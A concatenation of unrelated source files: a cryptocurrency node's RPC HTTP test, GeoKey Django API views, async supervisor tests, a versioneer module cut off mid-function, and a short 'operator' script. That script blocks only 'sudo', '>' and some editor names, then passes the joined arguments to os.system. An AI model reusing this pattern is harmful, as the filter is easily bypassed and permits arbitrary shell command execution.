filename | text
---|---
the-stack_0_12273 | #!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RPC HTTP basics."""
from test_framework.test_framework import MonicoinTestFramework
from test_framework.util import assert_equal, str_to_b64str
import http.client
import urllib.parse
class HTTPBasicsTest (MonicoinTestFramework):
def set_test_params(self):
self.num_nodes = 3
self.supports_cli = False
def setup_network(self):
self.setup_nodes()
def run_test(self):
#################################################
# lowlevel check for http persistent connection #
#################################################
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is not None #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1 #must also response with a correct json-rpc message
assert conn.sock is not None #according to http/1.1 connection must still be open!
conn.close()
# the same behaviour is expected if we explicitly add keep-alive, since that is the HTTP/1.1 standard
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is not None #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1 #must also response with a correct json-rpc message
assert conn.sock is not None #according to http/1.1 connection must still be open!
conn.close()
#now do the same with "Connection: close"
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is None #now the connection must be closed after the response
#node1 (2nd node) is running with disabled keep-alive option
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = urlNode1.username + ':' + urlNode1.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
#node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = urlNode2.username + ':' + urlNode2.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is not None # connection must still be open because monicoind uses keep-alive by default
# Check excessive request size
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*1000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*10000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
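# Illustrative sketch (not part of the original test): the "Authorization" header
# built above with str_to_b64str is assumed to be equivalent to plain base64
# encoding of "user:password", i.e. roughly:
#
#   import base64
#   def basic_auth_header(username, password):
#       authpair = username + ':' + password
#       token = base64.b64encode(authpair.encode('utf-8')).decode('ascii')
#       return {"Authorization": "Basic " + token}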
|
the-stack_0_12275 | """Views for observations of categories."""
from django.core.exceptions import PermissionDenied
from django.views.decorators.gzip import gzip_page
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from geokey.core.decorators import handle_exceptions_for_ajax
from geokey.users.models import User
from geokey.projects.models import Project
from geokey.core.exceptions import InputError
from ..renderers.geojson import GeoJsonRenderer
from ..parsers.geojson import GeoJsonParser
from .base import SingleAllContribution
from ..serializers import ContributionSerializer
class GZipView(object):
def dispatch(self, request, *args, **kwargs):
if not hasattr(self, 'META'):
setattr(self, 'META', {})
if request.META.get('HTTP_ACCEPT_ENCODING'):
self.META['HTTP_ACCEPT_ENCODING'] = request.META['HTTP_ACCEPT_ENCODING']
return super(GZipView, self).dispatch(request, *args, **kwargs)
class GeoJsonView(APIView):
renderer_classes = (GeoJsonRenderer,)
parser_classes = (GeoJsonParser,)
class ProjectObservations(GZipView, GeoJsonView):
"""
Public API endpoint to add new contributions to a project
/api/projects/:project_id/contributions
"""
@handle_exceptions_for_ajax
def post(self, request, project_id):
"""
Adds a new contribution to a project
Parameters
----------
request : rest_framework.request.Request
Represents the request
project_id : int
identifies the project in the database
Returns
-------
rest_framework.response.Response
Contains the serialised contribution
"""
user = request.user
if user.is_anonymous():
user = User.objects.get(display_name='AnonymousUser')
data = request.data
project = Project.objects.as_contributor(request.user, project_id)
if (not data.get('meta').get('status') == 'draft' and
project.can_moderate(user)):
data['meta']['status'] = 'active'
serializer = ContributionSerializer(
data=data, context={'user': user, 'project': project}
)
if serializer.is_valid(raise_exception=True):
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
@gzip_page
@handle_exceptions_for_ajax
def get(self, request, project_id):
"""
Handle GET request.
Return a list of all contributions of the project accessible to the
user.
Parameters
----------
request : rest_framework.request.Request
Represents the request.
project_id : int
Identifies the project in the database.
Returns
-------
rest_framework.response.Response
Contains the serialized contributions.
"""
project = Project.objects.get_single(request.user, project_id)
try:
contributions = project.get_all_contributions(
request.user,
search=request.GET.get('search'),
subset=request.GET.get('subset'),
bbox=request.GET.get('bbox')
).select_related('location', 'creator', 'updator', 'category')
except InputError as e:
return Response(e, status=status.HTTP_406_NOT_ACCEPTABLE)
serializer = ContributionSerializer(
contributions,
many=True,
context={
'user': request.user,
'project': project,
'search': request.GET.get('search'),
'bbox': request.GET.get('bbox')
}
)
return Response(serializer.data, status=status.HTTP_200_OK)
# ############################################################################
#
# SINGLE CONTRIBUTION
#
# ############################################################################
class SingleContributionAPIView(GeoJsonView):
"""
Abstract APIView for handling requests to single observations
"""
def get_and_respond(self, request, observation):
"""
Returns a single contribution
Parameters
----------
request : rest_framework.request.Request
Represents the request
observation : geokey.contributions.models.Observation
Observation to be returned
Returns
-------
rest_framework.response.Response
Contains the serialised observation
"""
serializer = ContributionSerializer(
observation,
context={'user': request.user, 'project': observation.project}
)
return Response(serializer.data, status=status.HTTP_200_OK)
def update_and_respond(self, request, observation):
"""
Updates and returns a single contribution
Parameters
----------
request : rest_framework.request.Request
Represents the request
observation : geokey.contributions.models.Observation
Observation to be returned
Returns
-------
rest_framework.response.Response
Contains the updated serialised observation
"""
data = request.data
user = request.user
if user.is_anonymous():
user = User.objects.get(display_name='AnonymousUser')
new_status = None
if data.get('meta') is not None:
new_status = data.get('meta').get('status')
user_can_moderate = observation.project.can_moderate(user)
user_is_owner = (observation.creator == user)
under_review = observation.comments.filter(
review_status='open').exists()
if (new_status is not None and new_status != observation.status):
if not (
(new_status == 'pending' and
(user_is_owner or user_can_moderate)) or
(new_status == 'active' and
observation.status == 'draft' and user_is_owner) or
(new_status == 'active' and
observation.status == 'pending' and user_can_moderate)):
raise PermissionDenied('You are not allowed to update the '
'status of the contribution from "%s" '
'to "%s"' % (
observation.status,
new_status
))
elif not (user_is_owner or user_can_moderate):
raise PermissionDenied('You are not allowed to update the '
'contribution')
if new_status == 'active' and under_review:
data['meta']['status'] = 'review'
if ((new_status == 'active' and observation.status == 'draft') and
not user_can_moderate):
default_status = observation.category.default_status
data['meta']['status'] = default_status
serializer = ContributionSerializer(
observation,
data=data,
context={'user': user, 'project': observation.project}
)
if serializer.is_valid(raise_exception=True):
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
def delete_and_respond(self, request, observation):
"""
Deletes a single observation
Parameters
----------
request : rest_framework.request.Request
Represents the request
observation : geokey.contributions.models.Observation
Observation to be deleted
Returns
-------
rest_framework.response.Response
Empty response indicating successful delete
"""
if (observation.creator == request.user or
observation.project.can_moderate(request.user)):
observation.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
raise PermissionDenied('You are not allowed to delete this '
'contribution')
class SingleAllContributionAPIView(
SingleAllContribution, SingleContributionAPIView):
"""
Public API endpoint for updating a single observation in a project
/api/projects/:project_id/observations/:observation_id
"""
@handle_exceptions_for_ajax
def get(self, request, project_id, observation_id):
"""
Returns a single contribution
Parameters
----------
request : rest_framework.request.Request
Represents the request
project_id : int
identifies the project in the database
observation_id : int
identifies the observation in the database
Returns
-------
rest_framework.response.Response
Contains the serialised observation
"""
contribution = self.get_contribution(
request.user,
project_id,
observation_id
)
return self.get_and_respond(request, contribution)
@handle_exceptions_for_ajax
def patch(self, request, project_id, observation_id):
"""
Updates and returns a single contribution
Parameters
----------
request : rest_framework.request.Request
Represents the request
project_id : int
identifies the project in the database
observation_id : int
identifies the observation in the database
Returns
-------
rest_framework.response.Response
Contains the updated serialised observation
"""
contribution = self.get_contribution(
request.user,
project_id,
observation_id
)
return self.update_and_respond(request, contribution)
@handle_exceptions_for_ajax
def delete(self, request, project_id, observation_id):
"""
Deletes a single contribution
Parameters
----------
request : rest_framework.request.Request
Represents the request
project_id : int
identifies the project in the database
observation_id : int
identifies the observation in the database
Returns
-------
rest_framework.response.Response
Empty response indicating successful delete
"""
contribution = self.get_contribution(
request.user,
project_id,
observation_id
)
return self.delete_and_respond(request, contribution)
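# Hypothetical URL wiring (not part of this module) showing how these views are
# typically exposed; the exact patterns and route names are assumptions:
#
#   from django.conf.urls import url
#   urlpatterns = [
#       url(r'^api/projects/(?P<project_id>[0-9]+)/contributions/$',
#           ProjectObservations.as_view()),
#       url(r'^api/projects/(?P<project_id>[0-9]+)/observations/(?P<observation_id>[0-9]+)/$',
#           SingleAllContributionAPIView.as_view()),
#   ]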
|
the-stack_0_12276 | #!/usr/local/bin/python
from os import system
from sys import argv
cl = argv[1]
liste = open('/usr/local/share/operator/editor').read()
if "sudo" in argv[1:]:
print("Can't use sudo with operator")
elif ">" in argv[1:]:
print("Can't use > with operator")
elif cl in liste:
print(("Can't use %s with operator!" % argv[1]))
else:
cmd = ''
for line in argv[1:]:
cmd += line + " "
system(cmd)
|
the-stack_0_12278 | import unittest
import unittest.mock
import re
from g1.asyncs import agents
from g1.asyncs import kernels
from g1.asyncs.bases import locks
from g1.asyncs.bases import queues
from g1.asyncs.bases import tasks
from g1.asyncs.bases import timers
class SuperviseAgentsTest(unittest.TestCase):
def setUp(self):
super().setUp()
self.main_task = None
self.agent_queue = tasks.CompletionQueue()
self.graceful_exit = locks.Event()
self.signal_queue = queues.Queue()
mock = unittest.mock.patch(agents.__name__ + '.signals').start()
mock.SignalSource().__enter__().get = self.signal_queue.get
self._assert_logs = self.assertLogs(agents.__name__, level='DEBUG')
self.cm = self._assert_logs.__enter__()
def tearDown(self):
unittest.mock.patch.stopall()
self._assert_logs.__exit__(None, None, None)
super().tearDown()
def assert_state(self, closed, queue_size, graceful_exit, log_patterns):
self.assertEqual(self.agent_queue.is_closed(), closed)
self.assertEqual(len(self.agent_queue), queue_size)
self.assertEqual(self.graceful_exit.is_set(), graceful_exit)
message = 'expect patterns %r in %r' % (log_patterns, self.cm.output)
if len(self.cm.output) != len(log_patterns):
self.fail(message)
for log_line, log_pattern in zip(self.cm.output, log_patterns):
if not re.search(log_pattern, log_line):
self.fail(message)
def run_supervisor(self):
self.main_task = tasks.spawn(
agents.supervise_agents(self.agent_queue, self.graceful_exit, 5)
)
kernels.run(timeout=0.01)
@kernels.with_kernel
def test_graceful_exit_by_user(self):
self.graceful_exit.set()
self.run_supervisor()
self.assert_state(True, 0, True, [r'graceful exit: requested by user'])
self.assertIsNone(self.main_task.get_result_nonblocking())
self.assertFalse(tasks.get_all_tasks())
@kernels.with_kernel
def test_signal(self):
self.signal_queue.put_nonblocking(1)
self.run_supervisor()
self.assert_state(True, 0, True, [r'graceful exit: receive signal: 1'])
self.assertIsNone(self.main_task.get_result_nonblocking())
self.assertFalse(tasks.get_all_tasks())
@kernels.with_kernel
def test_repeated_signals(self):
sleep_task = self.agent_queue.spawn(timers.sleep(99))
self.assert_state(False, 1, False, [])
self.signal_queue.put_nonblocking(1)
with self.assertRaises(kernels.KernelTimeout):
self.run_supervisor()
self.assert_state(True, 1, True, [r'graceful exit: receive signal: 1'])
self.signal_queue.put_nonblocking(2)
kernels.run(timeout=1)
self.assert_state(True, 0, True, [r'graceful exit: receive signal: 1'])
with self.assertRaisesRegex(
agents.SupervisorError,
r'receive signal during graceful exit: 2',
):
self.main_task.get_result_nonblocking()
with self.assertRaises(tasks.Cancelled):
sleep_task.get_result_nonblocking()
self.assertFalse(tasks.get_all_tasks())
@kernels.with_kernel
def test_agent_exit(self):
noop_task = self.agent_queue.spawn(noop)
self.assert_state(False, 1, False, [])
self.run_supervisor()
self.assert_state(
True, 0, True, [r'no op', r'graceful exit: agent exit: ']
)
self.assertIsNone(noop_task.get_result_nonblocking())
self.assertFalse(tasks.get_all_tasks())
@kernels.with_kernel
def test_agent_error(self):
raises_task = self.agent_queue.spawn(raises(ValueError('some error')))
self.assert_state(False, 1, False, [])
self.run_supervisor()
self.assert_state(True, 0, False, [])
with self.assertRaisesRegex(
agents.SupervisorError,
r'agent err out: ',
):
self.main_task.get_result_nonblocking()
with self.assertRaisesRegex(ValueError, r'some error'):
raises_task.get_result_nonblocking()
self.assertFalse(tasks.get_all_tasks())
# Make self._assert_logs.__exit__ happy.
agents.LOG.debug('dummy')
@kernels.with_kernel
def test_grace_period_exceeded(self):
self.graceful_exit.set()
sleep_task = self.agent_queue.spawn(timers.sleep(99))
self.assert_state(False, 1, True, [])
self.main_task = tasks.spawn(
agents.supervise_agents(self.agent_queue, self.graceful_exit, 0)
)
kernels.run(timeout=0.01)
self.assert_state(True, 0, True, [r'graceful exit: requested by user'])
with self.assertRaisesRegex(
agents.SupervisorError,
r'grace period exceeded',
):
self.main_task.get_result_nonblocking()
with self.assertRaises(tasks.Cancelled):
sleep_task.get_result_nonblocking()
self.assertFalse(tasks.get_all_tasks())
async def noop():
agents.LOG.debug('no op')
async def raises(exc):
raise exc
if __name__ == '__main__':
unittest.main()
|
the-stack_0_12279 | # This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.21 (https://github.com/python-versioneer/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
from typing import Callable, Dict
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = ""
cfg.parentdir_prefix = ""
cfg.versionfile_source = "prefect_email/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY: Dict[str, str] = {}
HANDLERS: Dict[str, Dict[str, Callable]] = {}
def register_vcs_handler(vcs, method): # decorator
"""Create decorator to mark a method as the handler of a VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False, env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
process = None
for command in commands:
try:
dispcmd = str([command] + args)
# remember shell=False, so use git.cmd on windows, not just git
process = subprocess.Popen(
[command] + args,
cwd=cwd,
env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr else None),
)
break
except OSError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = process.communicate()[0].strip().decode()
if process.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, process.returncode
return stdout, process.returncode
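# Example usage (illustrative, not part of the generated file): reading the
# current commit hash with the helper above; the return values are assumptions.
#
#   stdout, rc = run_command(["git"], ["rev-parse", "HEAD"], cwd=".")
#   # -> ("3f2a1bc...", 0) on success, or (None, None) if git is not installed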
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for _ in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {
"version": dirname[len(parentdir_prefix) :],
"full-revisionid": None,
"dirty": False,
"error": None,
"date": None,
}
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print(
"Tried directories %s but none started with prefix %s"
% (str(rootdirs), parentdir_prefix)
)
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
with open(versionfile_abs, "r") as fobj:
for line in fobj:
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
except OSError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if "refnames" not in keywords:
raise NotThisMethod("Short version file found")
date = keywords.get("date")
if date is not None:
# Use only the last line. Previous lines may contain GPG signature
# information.
date = date.splitlines()[-1]
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = {r.strip() for r in refnames.strip("()").split(",")}
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = {r[len(TAG) :] for r in refs if r.startswith(TAG)}
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = {r for r in refs if re.search(r"\d", r)}
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix) :]
# Filter out refs that exactly match prefix or that don't start
# with a number once the prefix is stripped (mostly a concern
# when prefix is '')
if not re.match(r"\d", r):
continue
if verbose:
print("picking %s" % r)
return {
"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False,
"error": None,
"date": date,
}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {
"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False,
"error": "no suitable tags",
"date": None,
}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, runner=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
TAG_PREFIX_REGEX = "*"
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
TAG_PREFIX_REGEX = r"\*"
_, rc = runner(GITS, ["rev-parse", "--git-dir"], cwd=root, hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = runner(
GITS,
[
"describe",
"--tags",
"--dirty",
"--always",
"--long",
"--match",
"%s%s" % (tag_prefix, TAG_PREFIX_REGEX),
],
cwd=root,
)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = runner(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
branch_name, rc = runner(GITS, ["rev-parse", "--abbrev-ref", "HEAD"], cwd=root)
# --abbrev-ref was added in git-1.6.3
if rc != 0 or branch_name is None:
raise NotThisMethod("'git rev-parse --abbrev-ref' returned error")
branch_name = branch_name.strip()
if branch_name == "HEAD":
# If we aren't exactly on a branch, pick a branch which represents
# the current commit. If all else fails, we are on a branchless
# commit.
branches, rc = runner(GITS, ["branch", "--contains"], cwd=root)
# --contains was added in git-1.5.4
if rc != 0 or branches is None:
raise NotThisMethod("'git branch --contains' returned error")
branches = branches.split("\n")
# Remove the first line if we're running detached
if "(" in branches[0]:
branches.pop(0)
# Strip off the leading "* " from the list of branches.
branches = [branch[2:] for branch in branches]
if "master" in branches:
branch_name = "master"
elif not branches:
branch_name = None
else:
# Pick the first branch that is returned. Good or bad.
branch_name = branches[0]
pieces["branch"] = branch_name
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[: git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r"^(.+)-(\d+)-g([0-9a-f]+)$", git_describe)
if not mo:
# unparsable. Maybe git-describe is misbehaving?
pieces["error"] = "unable to parse git-describe output: '%s'" % describe_out
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = "tag '%s' doesn't start with prefix '%s'" % (
full_tag,
tag_prefix,
)
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix) :]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = runner(GITS, ["rev-list", "HEAD", "--count"], cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = runner(GITS, ["show", "-s", "--format=%ci", "HEAD"], cwd=root)[0].strip()
# Use only the last line. Previous lines may contain GPG signature
# information.
date = date.splitlines()[-1]
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
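# Worked example (illustrative): for pieces like
#   {"closest-tag": "1.2.0", "distance": 3, "short": "abc1234", "dirty": True}
# render_pep440 yields "1.2.0+3.gabc1234.dirty"; with distance 0 and a clean
# working tree it yields just "1.2.0".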
def render_pep440_branch(pieces):
"""TAG[[.dev0]+DISTANCE.gHEX[.dirty]] .
The ".dev0" means not master branch. Note that .dev0 sorts backwards
(a feature branch will appear "older" than the master branch).
Exceptions:
1: no tags. 0[.dev0]+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
if pieces["branch"] != "master":
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0"
if pieces["branch"] != "master":
rendered += ".dev0"
rendered += "+untagged.%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def pep440_split_post(ver):
"""Split pep440 version string at the post-release segment.
Returns the release segments before the post-release and the
post-release version number (or -1 if no post-release segment is present).
"""
vc = str.split(ver, ".post")
return vc[0], int(vc[1] or 0) if len(vc) == 2 else None
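# Worked examples (illustrative):
#   pep440_split_post("1.2.0.post3") -> ("1.2.0", 3)
#   pep440_split_post("1.2.0")       -> ("1.2.0", None)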
def render_pep440_pre(pieces):
"""TAG[.postN.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post0.devDISTANCE
"""
if pieces["closest-tag"]:
if pieces["distance"]:
# update the post release segment
tag_version, post_version = pep440_split_post(pieces["closest-tag"])
rendered = tag_version
if post_version is not None:
rendered += ".post%d.dev%d" % (post_version + 1, pieces["distance"])
else:
rendered += ".post0.dev%d" % (pieces["distance"])
else:
# no commits, use the tag as the version
rendered = pieces["closest-tag"]
else:
# exception #1
rendered = "0.post0.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_post_branch(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX[.dirty]] .
The ".dev0" means not master branch.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]+gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["branch"] != "master":
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["branch"] != "master":
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
